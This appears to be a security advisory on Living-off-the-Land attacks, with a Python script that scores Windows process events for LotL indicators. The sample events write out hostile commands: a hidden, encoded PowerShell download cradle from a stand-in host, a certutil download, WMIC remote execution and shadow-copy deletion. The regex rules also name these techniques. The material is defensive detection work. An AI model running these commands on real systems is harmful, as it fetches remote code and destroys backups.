Living off the Land (LotL) Attacks
- FEBRUARY 18TH, 2026
Living off the Land (LotL) attacks occur when threat actors misuse legitimate tools already present on a system to carry out malicious activity. Rather than dropping custom malware, attackers drive trusted administrative utilities that are already installed, so their activity blends into normal operations and slips past controls that look for unknown or unsigned binaries.
In 2026, threat actors exploited vulnerabilities in SolarWinds Web Help Desk to gain unauthorised access to systems and installed legitimate administrative and monitoring tools to evade detection.
How LotL Attacks Work
Attackers typically:
1. Gain initial access through phishing, stolen credentials, or exposed services
2. Use built-in tools (e.g., PowerShell, WMI, remote administration utilities)
3. Escalate privileges and move laterally across systems
4. Establish persistence, exfiltrate data, or deploy ransomware
These actions often resemble normal administrative activity, making detection more difficult.
Why It Matters
LotL techniques are frequently observed in ransomware incidents, business email compromise (BEC), insider threats, and advanced persistent threat (APT) campaigns.
Because the activity relies on legitimate system tools, organisations must prioritise visibility, monitoring, and access control rather than attempting to block tools outright.
Risk Factors
Organisations face increased risk if they:
1. Allow excessive administrative privileges
2. Lack centralised logging and monitoring
3. Do not enforce multi-factor authentication (MFA)
4. Have weak password or credential management practices
Recommended Best Practices
1. Strengthen Access Controls: Enforce multi-factor authentication (MFA), apply least-privilege principles, and regularly review privileged accounts.
2. Enhance Monitoring: Implement centralised logging that captures process command lines and PowerShell script block activity, monitor administrative tool usage, and establish alerts for unusual behaviour patterns such as encoded or hidden-window PowerShell launches and interpreters spawned by document or browser processes.
3. Harden Systems: Restrict unnecessary administrative utilities, disable unused services, and apply security patches promptly.
4. Promote User Awareness: Conduct regular phishing awareness training and encourage prompt reporting of suspicious activity.
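As an added example (not code from the original advisory or from any vendor), the following Python script shows what "monitor administrative tool usage" looks like in practice for the tools named above. It runs a small set of LotL indicator rules over constructed process-creation events, decodes -EncodedCommand payloads so the same rules also see the hidden PowerShell, and flags command interpreters launched from Office or browser parents. The event field names, rule weights, severity thresholds and sample events are assumptions made for this example, not any product's schema; the IP address comes from a documentation range.

```python
"""Flag Living-off-the-Land indicators in Windows process-creation telemetry.

Added example written for this advisory; not code from the original page or any
vendor. Events are constructed and loosely model Security event 4688 (process
creation with command-line auditing); field names and rule weights are
assumptions made for this example, not a product schema.
"""
import base64, binascii, re
from dataclasses import dataclass, field
from typing import Optional

# PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -en, -enc);
# the payload is base64 over UTF-16LE text.
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# (indicator, weight, pattern): each runs over the raw command line and again over
# the decoded -EncodedCommand payload when there is one.
RULES = [
    ("encoded-command", 2, ENCODED_RE),
    ("hidden-or-bypass", 1, re.compile(r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|e(?:p|xecutionpolicy)\s+bypass)\b", re.I)),
    ("download-cradle", 2, re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|Start-BitsTransfer", re.I)),
    ("invoke-expression", 1, re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)),
    ("wmi-process-create", 3, re.compile(r"wmic(?:\.exe)?\s+(?:/node:\S+\s+)?process\s+call\s+create|Invoke-(?:Wmi|Cim)Method.*Win32_Process", re.I)),
    ("certutil-download", 3, re.compile(r"certutil(?:\.exe)?\s+.*-urlcache", re.I)),
    ("shadow-copy-deletion", 6, re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I)),
]
# An interpreter spawned by a document or browser process is the classic hand-off
# from a phishing lure to built-in tooling.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "wmic.exe"}
UNUSUAL_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe", "msedge.exe", "chrome.exe"}

@dataclass
class Finding:
    record_id: int
    image: str
    indicators: list = field(default_factory=list)
    score: int = 0
    decoded_command: Optional[str] = None

    @property
    def severity(self) -> str:
        return "high" if self.score >= 6 else "medium" if self.score >= 3 else "low" if self.score else "none"

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Plaintext behind -EncodedCommand, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def analyse_event(event: dict) -> Finding:
    """Score one process-creation event against the LotL indicator rules."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    finding = Finding(event["record_id"], image)

    def apply_rules(text: str, suffix: str = "") -> None:
        for name, weight, pattern in RULES:
            if pattern.search(text):
                finding.indicators.append(name + suffix)
                finding.score += weight

    apply_rules(event["command_line"])
    # The real command of an encoded launch is inside the payload, so inspect it too.
    finding.decoded_command = decode_encoded_command(event["command_line"])
    if finding.decoded_command:
        apply_rules(finding.decoded_command, " (decoded)")
    if image in INTERPRETERS and parent in UNUSUAL_PARENTS:
        finding.indicators.append(f"unusual-parent:{parent}")
        finding.score += 3
    return finding

def triage(events: list) -> list:
    """Findings with at least one indicator, highest score first."""
    return sorted((f for f in map(analyse_event, events) if f.score), key=lambda f: f.score, reverse=True)

def _event(record_id, parent_image, image, command_line):
    return dict(record_id=record_id, parent_image=parent_image, image=image, command_line=command_line)

# Constructed sample telemetry; 198.51.100.0/24 is a documentation range. The
# payload is encoded exactly as PowerShell expects so the decoder is exercised.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/u.ps1')"
_B64 = base64.b64encode(SAMPLE_CRADLE.encode("utf-16-le")).decode()
_PS, _CMD = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    _event(1, r"C:\Windows\explorer.exe", _PS, r"powershell.exe -NoProfile -File C:\Scripts\NightlyBackup.ps1"),
    _event(2, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", _PS, f"powershell.exe -nop -w hidden -enc {_B64}"),
    _event(3, _CMD, r"C:\Windows\System32\wbem\WMIC.exe", r'wmic /node:"FS01" process call create "cmd.exe /c whoami > \\FS01\c$\w.txt"'),
    _event(4, _CMD, r"C:\Windows\System32\certutil.exe", r"certutil.exe -urlcache -split -f http://198.51.100.7/t.txt C:\Users\Public\t.txt"),
    _event(5, _CMD, r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.severity:>6}] record {f.record_id} {f.image}: {', '.join(f.indicators)}")
        if f.decoded_command:
            print(f"         decoded: {f.decoded_command}")
```

Run it directly to see the constructed events triaged, or feed analyse_event() records exported from an EDR or SIEM after mapping the field names. A zero score is not proof of benign activity: the first sample (an unencoded scheduled backup script) scores nothing, but so would an attacker who simply types plain commands under a stolen admin account, which is why the access-control and least-privilege practices above matter alongside any rule set, and why rules like these should be tuned against a baseline of the organisation's own legitimate administrative behaviour.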